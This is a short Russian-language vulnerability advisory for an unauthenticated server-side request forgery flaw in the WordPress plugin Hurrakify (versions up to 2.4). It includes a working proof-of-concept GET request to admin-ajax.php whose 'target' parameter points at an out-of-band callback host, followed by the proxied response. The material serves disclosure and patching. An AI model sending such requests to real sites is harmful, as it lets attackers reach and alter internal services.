
Hurrakify <= 2.4 - Неаутентифицированная подделка серверных запросов
Hurrakify <= 2.4 - Неаутентифицированная подделка серверных запросов (SSRF)
Плагин Hurrakify для WordPress уязвим к Server-Side Request Forgery во всех версиях до 2.4 включительно. Это позволяет неаутентифицированным атакующим отправлять веб-запросы в произвольные места, исходящие из веб-приложения, что может быть использовано для запроса и изменения информации из внутренних сервисов.
GET /wp-admin/admin-ajax.php?action=hurraki_tooltip_proxy&target=http%3A%2F%2Fqrl9eu4dot1s941aio2eom17oyupif64.oast.site HTTP/2
Host: wp-dev.ddev.site
<html><body>bfdibc85r04ky96cie05dfzjjgigz</body></html>